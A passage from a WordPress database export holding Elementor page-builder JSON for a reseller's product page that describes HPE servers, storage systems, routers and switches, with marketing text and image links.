style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"202\\\" height=\\\"151\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_border\":\"solid\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_border\":\"solid\",\"border_color\":\"#e9e9e9\"},\"elements\":[],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><ul><li><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p>The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"150\\\" \\/><\\/p><p>HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><p>3.\\u00a0<strong>HPE Synergy<\\/strong><\\/p><p>Composable, software-defined infrastructure that speeds application delivery.<\\/p><ul><li><strong>HPE Synergy 12000 Frame<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p>HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p>The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><h2>DATA STORAGE<\\/h2><p>Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p><ul><li><strong>HPE StoreOnce Systems<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p>HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p>HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2519\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"189\\\" height=\\\"142\\\" \\/><\\/p><p>HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><h2>NETWORKING<\\/h2><ol><li><strong>Router<\\/strong><\\/li><\\/ol><p>Navigate more devices and simplify complex networks with intelligent management of open standards routing.<\\/p><ul><li><strong>HPE FLexNetwork MSR95x Router Series<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2520\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FLexNetwork-MSR95x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"227\\\" height=\\\"171\\\" \\/><\\/p><p>HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p>The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p>HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><p>2.\\u00a0<strong>Switches<\\/strong><\\/p><ul><li><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"153\\\" \\/><\\/p><p>The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><ul><li><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/li><\\/ul><p><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"212\\\" height=\\\"159\\\" \\/><\\/p><p>HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p><p><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8386,3631,'_wp_page_template','template-fullwidth.php'),(8387,3631,'_elementor_edit_mode','builder'),(8388,3631,'_elementor_template_type','post'),(8389,3631,'_elementor_version','2.5.14'),(8390,3631,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5d09ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ea019d6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"50f056f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6ba1eaa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"736e3d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"bf473fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba9d094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f64c755\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e4020c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4e09160\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: 